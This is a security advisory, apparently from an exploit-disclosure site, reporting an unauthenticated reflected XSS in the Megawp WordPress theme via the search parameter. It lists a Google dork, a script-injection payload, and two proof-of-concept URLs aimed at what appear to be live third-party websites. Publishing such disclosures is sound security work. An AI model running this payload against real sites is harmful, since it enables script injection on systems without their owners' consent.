Megawp WordPress Theme - Unauthenticated Reflected XSS

2021.12.06

EbRaHiM-GHiaSi (IR)

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

- # VULNERABILITY: Megawp WordPress Theme - Unauthenticated Reflected XSS
- # GOOGLE DORK: Megawp-Theme
- # DATE: 2021-02-10
- # SECURITY RESEARCHER: EbRaHiM-VaKeR [ https://ebrahim-ghiasi.ir ]
- # VENDOR: Megawp-Theme [ http://megawp.almastheme.com/megawp-demos/ ]
- # SOFTWARE VERSION: <= 1
- # SOFTWARE LINK: https://www.zhaket.com/web/megawp-wordpress-theme
- # CVE: N/A
*/

### -- [ Info: ]

[i] An Unauthenticated Reflected XSS vulnerability was discovered in the Megawp-Theme for WordPress.

[i] Vulnerable parameter(s): ?s=

### -- [ Impact: ]

[~]  code injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource.

### -- [ Payload: ]

[$] ?s="><script>alert(`hacked`)</script>

### -- [ PoC | Unauthenticated Reflected XSS | Search query: ]

[!] https://lms.golvani.ir/?s=%22%3E%3Cscript%3Ealert(`hacked`)%3C/script%3E

[!] https://baameshimi.ir/?s=%22%3E%3Cscript%3Ealert(`hacked`)%3C/script%3E

### -- [ Contacts: ]

[+] Website: ebrahim-ghiasi.ir
[+] Telegram: @hajit00n

See this note in RAW Version

Vote for this issue:

100%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Megawp WordPress Theme - Unauthenticated Reflected XSS

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.